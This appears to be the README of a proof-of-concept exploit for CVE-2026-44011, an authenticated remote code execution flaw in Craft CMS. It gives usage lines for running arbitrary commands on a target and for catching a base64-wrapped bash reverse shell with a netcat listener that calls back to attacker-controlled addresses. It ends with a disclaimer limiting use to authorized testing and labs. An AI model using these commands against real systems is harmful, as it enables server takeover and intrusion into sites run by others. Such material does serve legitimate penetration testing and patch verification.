
Python proof-of-concept for CVE-2026-44011 in Craft CMS, exploiting authenticated remote code execution with command execution and base64-wrapped reverse shell payloads.
CVE-2026-44011-craft-rce-poc Usage
Single command: bash
python3 craft_rce.py -b http://target -u USER -p PASS -c 'id'
Reverse shell (base64-wrapped bash):
nc -lvnp 4444
python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.10.14.213 4444
If the target cannot reach your callback, point it explicitly:
python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.13.37.200 4444 -H 10.13.37.200 --listen-port 35509
Disclamer
For authorized testing, CTFs and lab environments only. Do not use against systems you do not own or have explicit permission to test.